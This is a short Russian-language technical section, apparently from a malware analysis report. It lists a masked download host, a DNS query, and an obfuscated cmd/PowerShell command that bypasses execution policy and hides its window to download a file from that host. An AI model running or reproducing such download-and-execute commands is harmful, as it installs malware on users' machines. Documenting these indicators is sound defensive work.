Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RSHell.ex^e^ -eXecutIO^npoLiCY^ Byp^aSS -nOp^rOFIlE -^WiND^OwsTYl^e ^H^i^d^De^n ^(n^eW^-o^b^JeCt SySTem^.^n^Et.WeBCL^IeNt).d^O^WN^LOad^FiL^E^('http://ho####wergop.top/read.p...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RSHell.ex^e^ -eXecutIO^npoLiCY^ Byp^aSS -nOp^rOFIlE -^WiND^OwsTYl^e ^H^i^d^De^n ^(n^eW^-o^b^JeCt SySTem^.^n^Et.WeBCL^IeNt).d^O^WN^LOad^FiL^E^('http://ho####wergop.top/read.p...' (со скрытым окном)